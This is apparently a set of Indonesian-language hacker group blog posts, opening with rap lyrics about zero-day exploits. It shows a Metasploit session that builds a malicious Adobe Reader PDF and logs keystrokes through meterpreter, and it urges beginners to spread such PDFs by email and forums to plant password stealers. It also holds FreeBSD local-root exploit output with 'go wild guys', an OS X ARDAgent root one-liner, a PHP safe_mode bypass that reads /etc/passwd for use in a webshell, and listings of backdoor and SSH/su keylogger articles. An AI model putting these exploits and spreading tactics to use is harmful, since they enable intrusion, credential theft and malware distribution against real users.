Kecoak Elektronik Indonesia

They take the world over one node at a time.
They put the seed in some software and make it shine.
so the dimwitted among us grab tight and install
put it right on the wall, and don’t notice at all
that the celebration of a day impends.
I want to note it on the calendar, I ready my pen,
I get ahead of my friends in my haste, I let slip
that the zero day is coming, MC Front still ill equipped.
Boom how it hits you, when it comes
if you’re touching on an interface you steady your thumbs
since you might have to jump ship quick, the sting stuns
it isn’t designed to destroy, it’s just how it runs
and I sing fun songs but this here is a warning
that the exploit’s open and it might sound corny
but I give a damn about the state of the Earth
expect a hacker has to wreck it just to teach it what it’s worth.

And on the first day, it’s already too late…

Press play, prepare as history is made:
“largest hack in one day,” all the headlines will say.
All out of time, hear the chime from the buzzer.
Found this bug on my own, no need for a fuzzer.

“It’s already too late,” spreading as we planned.
No need for the NO OPs, I know just where to land.

Clearing out the registers, with pointers to my functions,
loaded to your memory and writing new instructions.

Braindump i/o, siphoned out the eye holes;
enticed so i’m digging through the disassembled byte code.

Push pop change order stack frame FILO
filesystem inodes, all fall to my flow.

Running over, there again i go:
self-propagation engine, polymorphic sideshow.

Every network, we’re found to get around…
the exploit payload encoded in this sound.

Man, cousin, I’m about to put in the work,
assert authority. Administrative access: crack this.
If your patches back in the past, this
0day gets you on a root trip. True crypt.
Key file, I will keystyle shell code,
triple sevens all up on the ch mod.
Shhh mode, how I’m keeping this here,
’cause if I keep my game on tight my 0day lasts another year.
You’re a little bit late.
I had that nfsd back in ninety-eight
and the DCOM bomb owned the Zone Alarm
so get your lip balm kitty; NEDM three fitty.
Got them bots in every city with the spamtec committee
and yt the almighty, zero day beats flying. And who’s giant?
That’s us. With the upstream plus, we’re CAN-SPAM compliant.

Yo, when it flips, new world is a permanent state.
Cultivate paranoia ’cause the Huns at the gate
are many millions strong, all arrive in a spate.
YT Crack and Int80 been shipping them freight.
All walls up to date, let them come, you can cope.
Pwn the rug out from under you and sunder your hopes.
Send a no points bulletin out; they’re undiscovered.
Eyes to the horizon! Not much longer undercover.

Credits: http://frontalot.com/index.php/?page=lyrics&lyricid=65

Salah satu artis yang terkenal dengan istilah ‘bechek’-nya pernah bilang dalam salah satu sesi wawancara untuk “acara televisi full of non-sense but terribly popular” (attention: something called infoblabla) bahwa twitter, facebook, friendster itu gak ada gunanya. Do’i gak mungkin ikutan begituan karena terlalu sibuk dengan skull, corse, blablabla. Dan yang ikutan begituan (attention: geek said, social networking) hanya orang-orang yang gak punya kerjaan.

Well, somehow, this cute little girl *heh??* probably right.

Unfortunately, gak semua orang update status untuk hal-hal yang tidak perlu. Komunitas security umumnya seringkali memposting hal-hal yang bermanfaat, dan lebih cepat mendapatkan informasi tersebut dibandingkan menunggu muncul di blog, news, forum, dll. Beberapa hal menarik diantaranya diskusi kecil-kecilan mengenai bug dan expl0it.

Baru-baru ini merebak mengenai adobe acrobat reader 0day, salah satu yang membahas bisa lihat di http://bit.ly/7UjG26. HDM dalam twitter nya pernah meminta contoh exploit tersebut bagi siapa saja yang memilikinya, dan dalam waktu singkat contoh 0day sploit tersebut didapatkan, copy nya bisa di download dari http://bit.ly/5VqgVv. Dan tentu saja dalam beberapa jam exploit tersebut muncul dalam repo metasploit, let’s give it a try:

Snow $ sudo ./msfconsole
Password:

                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888

       =[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 476 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7893 updated today (2009.12.16)

msf  > version
Framework: 3.3.3-dev.7817
Console  : 3.3.3-dev.7855
msf > use windows/fileformat/adobe_media_newplayer
msf exploit(adobe_media_newplayer) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(adobe_media_newplayer) > set RHOST 172.16.30.129
RHOST => 172.16.30.129
msf exploit(adobe_media_newplayer) > exploit

[*] Started bind handler
[*] Creating 'msf.pdf' file...
[*] Generated output file /Applications/Metasploit/data/exploits/msf.pdf
[*] Exploit completed, but no session was created.

Dear newbie, silahkan copy file msf.pdf ke komputer target untuk dibuka menggunakan adobe acrobat reader. Dalam eksperimen ini saya menggunakan adobe acrobat reader versi 9.1.0 di windows XP SP3 (non DEP).

msf exploit(adobe_media_newplayer) > exploit

[*] Started bind handler
[*] Creating 'msf.pdf' file...
[*] Generated output file /Applications/Metasploit/data/exploits/msf.pdf
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (172.16.30.1:57665 -> 172.16.30.129:4444)

meterpreter > idletime
User has been idle for: 2 mins 25 secs
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
www.google.com
meterpreter > ctrl-z
Background session 1? [y/N]

Well, tentu saja dry joke (talking ’bout artist di blog kecoak???) di malam hari menjelang tidur ini bukan untuk high skilled exploiter. Hanya menunjukan sedikit mainan dari exploit terbaru Adobe acrobat reader menggunakan metasploit framework. Dalam contoh diatas tentu saja tidak selalu harus untuk kepentingan RCE (Remote Command Execution), bisa di-imajinasikan jika payload yang digunakan adalah “windows/download_exec” dari url tertentu dimana pada url tersebut telah tersimpan worm, program kecil pencuri password (paypal, email, facebook, banking), program kecil pencuri keystroke di windows, program kecil yang dapat men-scan document untuk mencari data tertentu (misal: doc pemerintahan, bisnis), ataupun sekedar bot untuk menjadi slave serangan ddos.

Cukup sebar file .pdf tersebut melalui email, irc, milist, forum, facebook, dll. Dan dalam sekejap, banyak hal yang kita inginkan bisa didapatkan. Itu sebabnya vuln dari software seperti adobe acrobat reader yang notabene pasti ada di setiap komputer windows sangat berbahaya, berbagai level dan kalangan menggunakan aplikasi tersebut, sehinggal 0day nya akan berakibat fatal.

So, take care, fellas!

King Cope publish local exploit ini ke FD-Lists.

[bofh@begok ~/hack]$ uname -a
FreeBSD begok.xxxx.de 7.0-STABLE FreeBSD 7.0-STABLE #1: Fri Mar 27 11:24:51 WIT 2009     root@begok.xxxxx.de:/usr/obj/usr/src/sys/BEGOK  i386
[bofh@begok ~/hack]$ ./fbsd-local-2009.sh
fbsd-local-2009.sh FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
8:35
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# id
uid=1007(bofh) gid=1007(bofh) euid=0(root) groups=1007(bofh)

Publikasi ini jelas akan langsung dimanfaatkan dengan cepat oleh para hacker/cracker yang bisa mendapatkan akses local ke mesin-mesin FreeBSD. Rasanya belum ada patch untuk saat ini. So, go wild guys? :p.

** Thanks buat temon untuk testing exploitnya, as currently I don’t have FBSD to test. *sigh*.

Tavis Ormandy mengeluarkan advisories mengenai NULL pointer dereference vulnerability pada implementasi socket untuk kernel Linux 2.6 dan 2.4. Full advisoriesnya dapat dilihat pada FD-list. Spender dari grsecurity project merilis exploit untuk bug ini dengan memanfaatkan pulseaudio seperti rilis exploit sebelumnya. Jadi jika ada yang memiliki server dengan pulseaudio versi lama dan belum di patch, serta mengaktifkan modul-modul yang vulnerable terhadap hole ini, sebaiknya melakukan uji coba terhadap server tersebut, paling tidak dengan exploit spender yang kemungkinan besar akan digunakan begitu saja oleh script kiddies.

Uninstall pulseaudio jika tidak digunakan, atau merubah pathnya dari default mungkin akan mengurangi dampak serangan para script kiddies. Beberapa tindakan pencegahan dapat dilakukan, namun yang pasti SELinux tidak dapat menolong banyak karena pada exploit ini terdapat implementasi untuk bypass SELinux .

~ GS

Menjelang Security Conference BlackHat 2009 di Las Vegas, ZFO memberi sambutan yang cukup hangat dengan me-release Ezine mereka yang ke-5. Salah satu mirror-nya bisa di lihat disini. Seperti-nya gerakan para Undergrounders seperti 5-6 tahun yang lalu bakal mulai terulang. Seruu….

Jika dilihat dari log yang mereka tuliskan dihalaman deface sepertinya lagi-lagi hasil dari 0day openssh. Log lengkapnya bisa dilihat dari FD-List. Potongan screenshot bisa dilihat dari sini.

Thanks cybertank yang masih sempat ambil screenshot nya .

$ osascript -e ‘tell app “ARDAgent” to do shell script “whoami”‘
root

Simple, tapi critical. Untuk yang menggunakan OS X dan masih mendapatkan response dari shell seperti diatas ada baiknya mengikuti workaround dari http://www.tuaw.com/ardfix/. Walaupun banyak pendapat yang mengatakan bugs ini butuh ‘physical access’, tapi tetap saja setuid root vulnerability ini bisa jadi jalan masuk trojan melalui web, yang pasti bisa melakukan banyak hal tanpa password.

Hail hackers, getting drunk last night?enjoy the party?following to count-down the silly clock?c’mon, whatever you did New TokET (Volume 3) of Kecoak Elektronik Indonesia is available for you as 2008’s new years present. Here’s some of our special menu:

[*] The Art of Beeing Invisible – ByteKrew
Kreatifitas pemasangan backdoor dan keylog untuk keperluan massive gaining server. Stealth – anonym backdooring dengan kombinasi penjelasan konsep dan teknikal.

[*] Perkenalan Terhadap Insiden – BytesKrew
Pengenalan terhadap insiden cyber dan bagaimana merespon sebuah insiden serta membangun pertahanan dan system logging untuk meminimalkan resiko sebuah insiden.

[*] Fuzzer dan Teknologi Security – Cyb3rh3b
Otomatisasi pencarian flaw pada suatu aplikasi menggunakan fuzzer. Pembahasan dari konsep fuzzer sederhana diteruskan ke fuzzer public release.

[*] SSH Client keylogger patch – BytesKrew
Modifikasi ssh client OpenSSH 3.9p1 OpenSSH 4.5p1 dan OpenSSH 4.7p1 untuk keperluan keylogging username dan password outgoing login SSH.

[*] Keylogging Root Password with Evil su – csh
Trapdoor menggunakan fake su command. Get the password – compromise the root.

Grab the complete links from here.

Well…WabiSabi Labi, industri baru yang dibungkus dengan nuansa dan inovasi baru sebagai tempat penjualan 0day sepertinya harus menunda pesta meriahnya. Roberto Preatoni, salah satu co-founder dan direktur strategi perusahaan ini plus founder dari Zone-H ditangkap di italy atas kasus skandal berupa penyadapan terhadap Telecom Italy.

Penangkapan preatoni tidak ada sangkut pautnya dengan pasar jual-beli 0day tersebut, preatoni ditangkap berhubungan dengan pekerjaannya sebagai security consultant. Telecom italy menggunakan tenaga preatoni beserta “tiger team”-nya sebagai security expert untuk melakukan proses penetration testing terhadap tingkat security IT perusahaan tersebut. Namun anggota tiger team ini ketahuan memasang trojan horse dan melakukan penyadapan data-data rahasia terhadap sejumlah orang penting, diantaranya CEO dari Brazil Telecom. Preatoni diduga membantu proses setting-up aksi skandal ini saat sedang melakukan pekerjaannya sebagai security consultant.

Aksi skandal ini memang tidak berhubungan dengan WabiSabi Labi, namun secara tidak langsung akan berpengaruh pada kredibilitas market tersebut. Konsep WabiSabi Labi sebenarnya tidak jauh berbeda dengan perusahaan-perusahaan seperti 3Com, iDefense, Immunity yang membayar *researcher* untuk menyediakan 0day. Namun industri-industri tersebut umumnya membeli exploit untuk kemudian dilaporkan kepada vendor yang bersangkutan, dengan kata lain industri-industri tersebut bisa menjadi media/jembatan antara pihak yang menemukan vulnerability suatu aplikasi dengan vendor yang memproduksi aplikasi tersebut, dan tentu saja ada imbalan yang akan diberikan kepada si penemu vulnerability untuk jerih payahnya melakukan riset dalam menemukan bugs (fuzzer, hunneh?!).

WabiSabi Labi merupakan industri yang membuka pasar secara lebih terbuka, dalam arti…jika kamu memiliki sebuah 0day, maka kamu bisa menjualnya melalui WabiSabi Labi dan ditawarkan kepada pembeli secara bebas (aha, teringat dengan pasar darknet?), siapapun bisa membayar untuk exploit tersebut. Dan mekanismenya bahkan lebih eksklusif, yaitu pembeli 0day bisa menentukan eksklusifitas-nya dimana WabiSabi Labi tidak akan menjual 0day tersebut kepada pihak lain, jadi hanya pembeli eksklusif itulah yang memiliki 0day itu.

Hal lain nya?WabiSabi Labi juga akan menjadi vendor penyedia produk IDS (Intrusion Detection System) yang bekerja sama dengan produsen hardware tertentu untuk menyediakan produk ini, dan signature untuk IDS ini menggunakan database 0day yang diperjual belikan pada pasar WabiSabi Labi. Tentu saja, si penyumbang eksploit akan mendapatkan semacam royalti selama 0day nya masih ada di database dan digunakan oleh client. Dengan memanfaatkan WabiSabi Labi maka para penyumbang 0day (call it researcher, or…blackhat or..whatever):

1. Akan mendapatkan bayaran atas jerih payah nya (dlm hal ini Wabi bertindak sebagai broker), jumlah nya pun mungkin bisa jadi lebih besar dibandingkan menggunakan jasa iDefense dll (jelas, karena pihak pembeli bisa siapapun, termasuk organisasi kriminal yang ingin mendapatkan akses ssh ke bank, misalnya ).
2. WabiSabi Labi pun dalam hal ini akan bertindak sebagai vendor security penyedia produk dengan signature database 0day yang belum di-publish dimanapun (ini teknik marketing baru yang cerdik untuk menarik banyak client ).
3. Buat kamu-kamu yang punya 0day pun akan mendapatkan royalti selama signature database nya masih digunakan oleh client, berarti duit ngalir dan riset tidak sia-sia (duit..duit..duit..duit.. ).
4. Dll

Itu sekelumit cerita tentang WabiSabi Labi dan Roberto Preatoni sebagai salah satu founder nya, yang ternyata harus di-busted akibat tuduhan membantu setting-up skandal pemasangan trojan dan penyadapan data-data penting saat diberikan kepercayaan untuk melakukan audit security. Yang pasti, akibat kejadian ini mungkin pihak vendor akan lebih berhati-hati saat menyewa security consultant, bisa jadi mereka menyewa maling yang berkostum polisi .

So, ada yang tertarik bermain di WabiSabi Labi untuk duit tambahan?atau lebih suka memamerkan exploit di milw0rm/bugtraq dengan quote shout yang panjang namun inti exploit cuma 3 baris?atau lebih memilih masuk dalam kegelapan dunia underground dan bertransaksi disana?atau…cukup simpan sendiri dan menikmati keluar masuk server pemerintah kemudian baca email-email mereka maupun digunakan untuk kampanye umum (DEFACE!!!) melakukan protes terhadap negara lain misalnya?

Well, the choice is yours, you guys know who you are… =))

Someone /at/ kecoak elektronik just lost his private 0day, the 0day technique to bypass safemode php and apache chroot using mysql has been leaked and publish on public disclosure site. No need to keep it anymore, so he just released the PoC to the public:

——————- Cut here ————————

<?php
/*
It has been a while i make this exploit to be a private collection
I use this exploit to bypass :
- Safe_mode PHP all version
- By default install apache in OpenBSD 3.x (dunno exactly) is chroot in /var/www/
Tested :
Ubuntu 6.06 – Fedora Core 5 – OpenBSD 3.9
By : Someone [at] k-elektronik
*/

echo “safe_mode = ” . ini_get(’safe_mode’) . “\n”;
$conn = mysql_connect(”localhost”, “root”, “rahasia”);
$result = mysql_query(”select load_file(\”/etc/passwd\”) as password”);
while($row = mysql_fetch_object($result))
echo $row->password;

?>

——————- Cut here ————————

Just play around do_system() function to get the system command executed. Take the vi and put those function on ur webshell.